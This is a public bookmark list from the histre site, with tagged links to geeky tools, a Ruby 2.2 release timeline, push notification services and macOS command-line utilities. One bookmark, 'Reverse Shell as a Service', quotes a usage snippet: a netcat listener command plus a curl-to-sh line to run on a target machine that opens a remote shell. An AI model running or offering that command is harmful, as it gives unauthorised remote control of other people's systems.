Public Notes
on
histre
Rationality Cardinality
rationalitycardinality.com
#!TO_TAG_bit_more #party_games #nerdy #geeky #card_games #rationality #logic #philosophy #less_wrong #pub
Show More
Ruby 2.2.0 Released
www.ruby-lang.org
Just seeing the timeline for Ruby 2.2 release as in late 2015-12, Ruby-2.3.0preview1 and for over a week, Ruby-2.3.0preview2 have been out :).
Timeline for Ruby-2.2 release via official blog news entries began with Ruby-2.2.0-preview1 on 2014-09-18 to Ruby 2.2.0 on 2014-12-25. 14 weeks between the two. Though the RC1 was out 13 weeks after preview1. Then the first minor release was 2.2.1 was out on 2015-03-03, 9.5 weeks after the first stable release. Ruby blog likes to call minor releases "TEENY version release of the stable X.Y series". This was indeed just bug fixes and a security fix maybe.
Complete timeline from the official blog:
2015-03-03 - Ruby 2.2.1 Released
2014-12-25 - Ruby 2.2.0 Released
2014-12-18 - Ruby 2.2.0-rc1 Released
"We are pleased to announce the release of Ruby 2.2.0-rc1. After RC1, all changes will be limited to bug fix only. The final release of Ruby 2.2.0 is scheduled on December 25, 2014."
2014-11-28 - Ruby 2.2.0-preview2 Released
2014-09-18 - Ruby 2.2.0-preview1 Released
#ruby #geeky #releases #release_notes #trends #dates #data #pub
Show More
The Nerd Machine
www.thenerdmachine.com
Zachery Levi and 2 prop masters from Chuck started this site.
#fanboys #moi #sites #tv_show:chuck #geeky #geek_culture #pop_culture #pub
Show More
The Nerd Machine - Wikipedia, the free encyclopedia
en.wikipedia.org
Zachery Levi and 2 prop masters from Chuck started this site.
#fanboys #moi #sites #tv_show:chuck #geeky #geek_culture #pop_culture #%wiki #bookmarked_on_site #pub
Show More
Statspotting! | Interesting Statistics, Every Day!
statspotting.com
SearchLink - BrettTerpstra.com
brettterpstra.com
#productivity_fun #keyboard_centric #cli #geeky #Alfred #pub
Show More
Mactracker
mactracker.ca
#apple_ecosystem_focused #mac #iOS #apps #free #lists #geeky #info #pub
Show More
Free WiFi Password - Instabridge App
instabridge.com
UserFriendly.Org
userfriendly.org
List of largest Internet companies - Wikipedia
en.wikipedia.org
List of the largest information technology companies - Wikipedia
en.wikipedia.org
List of the largest software companies - Wikipedia
en.wikipedia.org
Is RubyMine worth it? : ruby
www.reddit.com
#dev #geeky #text_editor #IDEs #discussions #pub
Show More
Dynalist Forum
talk.dynalist.io
#discussions #dynalist #startups #tools #web_apps #apps #%i_use_this_legit #communities #geeky #discourse #iOS_apps #mac_apps #SaaS #note_taking #pub
Show More
Tap Forms - Organizer Database App for Mac, iPhone, and iPad
www.tapforms.com
#apple_watch_apps #geeky #apple_ecosystem_focused #scripting #best_of #digital_organization #Ked #one_time_payments #pricey_ish #pub
Show More
Apple iPad, iPhone & Mac Video Tutorials from ScreenCastsOnline
screencastsonline.com
can download all at once and cancel
#$check_more #$check_out_FOR_SURE #SaaS #cheapish #trial #screencasts #guides #tutorials #superusers #geeky #apple_ecosystem #pub
Show More
Jedda | Pushover Action for Growl
jedda.me
#$kippt_bookmark_lists #API_driven #APIs #SaaS #alternatives #android #extensions #free #freemium #geeky #iOS #neat #plugins #push_notifications #pub
#push_notifications #plugins #extensions #SaaS #free #geeky #neat #$kippt_bookmark_lists #alternatives #freemium #iOS #android #APIs #API_driven #pub
#push_notifications #plugins #extensions #SaaS #free #geeky #neat #$kippt_bookmark_lists #alternatives #freemium #iOS #android #APIs #API_driven #pub
Show More
#push_notifications #API_driven #APIs #push #extensions #%on_github #free #geeky #neat #ecosystems #pub
Show More
About ntfy — ntfy 2.4.4 documentation
ntfy.readthedocs.io
#push_notifications #API_driven #APIs #push #extensions #%on_github #free #geeky #neat #ecosystems #pub
Show More
Prowl - iOS Push Notifications
www.prowlapp.com
#best_of #push_notifications #API_driven #APIs #push #extensions #%on_github #free #geeky #neat #iOS #pub
Show More
Nicholas Riley: Software
sabi.net
If you use shell scripts to automate macOS applications, you may need to switch between, hide, show or quit applications. Need to launch an X11 application from Terminal but the X server isn't in front when you need it? Use appswitch to fix the problem. Or, if you'd like a version of the ps(1) utility which understands the concept of macOS applications, appswitch can help.
#$tag_more #cli #dev #geeky #neat #%on_github #mac #shell #pub
"If you use shell scripts to automate macOS applications, you may need to switch between, hide, show or quit applications. Need to launch an X11 application from Terminal but the X server isn't in front when you need it? Use appswitch to fix the problem. Or, if you'd like a version of the ps(1) utility which understands the concept of macOS applications, appswitch can help. Apple provides a simple command-line launching program called open with macOS. launch offers several options that open doesn't. It: opens "slack" URLs (e.g. apple.com) and email addresses (-l) lets you specify applications by their four-character creator (e.g. 'ToyS') or Java-style bundle ID (e.g. com.apple.ScriptEditor2), both of which allow you to move or rename an application without changing references to it lets you find applications rather than opening them (-n) asks applications to print documents (-p) allows you to pipe output to any GUI application (not just TextEdit) displays extensive file, folder and volume information including type, creator, bundle ID, sizes, dates and versions (-f) reports errors intelligibly and much more! launch is useful by itself, but is even better when used in scripts. Assign a shell command to your favorite macOS text, graphics or resource editor. Browse your favorite Web site with a few keystrokes." #$tag_more #cli #dev #geeky #neat #%on_github #mac #shell #pub
"If you use shell scripts to automate macOS applications, you may need to switch between, hide, show or quit applications. Need to launch an X11 application from Terminal but the X server isn't in front when you need it? Use appswitch to fix the problem. Or, if you'd like a version of the ps(1) utility which understands the concept of macOS applications, appswitch can help. Apple provides a simple command-line launching program called open with macOS. launch offers several options that open doesn't. It: opens "slack" URLs (e.g. apple.com) and email addresses (-l) lets you specify applications by their four-character creator (e.g. 'ToyS') or Java-style bundle ID (e.g. com.apple.ScriptEditor2), both of which allow you to move or rename an application without changing references to it lets you find applications rather than opening them (-n) asks applications to print documents (-p) allows you to pipe output to any GUI application (not just TextEdit) displays extensive file, folder and volume information including type, creator, bundle ID, sizes, dates and versions (-f) reports errors intelligibly and much more! launch is useful by itself, but is even better when used in scripts. Assign a shell command to your favorite macOS text, graphics or resource editor. Browse your favorite Web site with a few keystrokes." #$tag_more #cli #dev #geeky #neat #%on_github #mac #shell #pub
Show More
Reverse Shell as a Service
shell.now.sh
"# Reverse Shell as a Service
# https://github.com/lukechilds/reverse-shell
#
# 1. On your machine:
# nc -l 1337
#
# 2. On the target machine:
# curl https://shell.now.sh/yourip:1337 | sh
#
# 3. Don't be a dick"
#dev #geeky #interesting #pub
Show More
Exist on changemap
changemap.co
Collect and share the web
Get started for free